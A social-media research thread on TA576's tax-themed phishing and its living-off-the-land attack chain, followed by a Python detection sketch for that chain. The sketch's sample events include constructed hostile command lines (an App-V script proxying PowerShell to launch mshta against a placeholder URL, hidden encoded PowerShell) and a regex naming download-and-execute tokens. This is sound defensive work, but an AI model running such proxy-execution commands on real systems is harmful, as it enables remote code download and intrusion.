New research from @Ffforward and me looking at the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations.

They always pop up during tax season in the US and use lures with funny back stories (help! my last accountant messed up my taxes).

https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax

Security Brief: ‘Tis the Season for Tax Hax  | Proofpoint US

What happened  Proofpoint researchers recently identified the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations. T...

Proofpoint

The actor came back with a pretty funky attack chain:

Benign Message > Target Reply > Actor Reply with web.app URL > Redirect > ZIP > LNK > SyncAppvPublishingServer.vbs LOLBAS > PowerShell > MSHTA runs HTA from URL > Encrypted PowerShell > Obfuscated PowerShell > Download and Run EXE

TA576 is typically a harbinger of more ecrime actors using tax-themed lures as US tax season ramps up. In fact, we've seen TA558 and unattributed clusters using tax themes towards the end of the month.

TA576’s unique attack chain demonstrates behaviors that are increasingly used by cybercrime threat actors, including “living off the land” techniques using existing scripts and services on a host to conduct malicious activities and chaining multiple PowerShell scripts together before the final payload execution.

This is part of the trend featuring more creativity and attack chain experimentation among cybercrime threat actors.

Read the blog with IOCs available: https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax

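A detection sketch for the host-side part of that chain (LNK > SyncAppvPublishingServer.vbs > PowerShell > mshta from URL > PowerShell), written as an added example; this is not Proofpoint's code and not from the blog. It assumes process-creation telemetry with parent image, image and command line (field names modelled loosely on Sysmon Event ID 1), and the sample events below are constructed to mirror the chain, not real TA576 command lines.

```python
"""Flag the living-off-the-land process chain described above.

Added example: not Proofpoint's code. ProcEvent's field names are an
assumption (modelled on Sysmon EID 1 / 4688); SAMPLE_EVENTS are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.I)
# PowerShell download/execute tokens that have no business in the argument
# SyncAppvPublishingServer.vbs forwards to powershell.exe (LOLBAS behaviour).
PS_ABUSE_RE = re.compile(
    r"(?<![\w-])(iex|iwr|invoke-expression|invoke-webrequest|downloadstring|"
    r"downloadfile|frombase64string)(?![\w-])",
    re.I,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of the chain stages this single event matches."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line
    hits: list[str] = []
    # Stage: script host running the App-V sync script with a PowerShell payload as argument
    if img in SCRIPT_HOSTS and "syncappvpublishingserver.vbs" in cmd.lower():
        arg = cmd.lower().split("syncappvpublishingserver.vbs", 1)[1]
        if PS_ABUSE_RE.search(arg) or URL_RE.search(arg):
            hits.append("syncappv_vbs_powershell_proxy")
    # Stage: PowerShell spawned by the script host (the .vbs launches powershell.exe)
    if img in PS_HOSTS and parent in SCRIPT_HOSTS:
        hits.append("powershell_from_script_host")
    # Stage: mshta pulling an HTA straight from a URL
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
    # Stage: the HTA handing off to (typically encoded) PowerShell
    if img in PS_HOSTS and parent == "mshta.exe":
        hits.append("powershell_from_mshta")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched stages, for events that matched anything."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, illustrative only
    # benign: a user opening PowerShell from the shell
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe"),
    # LNK launches the LOLBAS script with an argument it forwards to PowerShell
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs '
              r'"n;Start-Process mshta http://example.invalid/x.hta"'),
    # the script host starts PowerShell
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              'powershell.exe -NoProfile "Start-Process mshta http://example.invalid/x.hta"'),
    # mshta fetches the HTA from a URL
    ProcEvent(PS, r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/x.hta"),
    # the HTA runs encoded PowerShell
    ProcEvent(r"C:\Windows\System32\mshta.exe", PS, "powershell.exe -w hidden -enc SQBFAFgA"),
    # benign: an unrelated logon script under cscript
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cscript.exe",
              r"cscript.exe \\fs01\netlogon\map_drives.vbs"),
]

if __name__ == "__main__":
    for idx, stages in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line, "->", stages)
```

Each rule fires on one event in isolation; correlating the four hits by process lineage or by time window on one host is what turns them into a confident alert, since a lone `powershell_from_script_host` can have benign admin causes.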
Honestly I’m just delighted I somehow got this headline through the review process hehe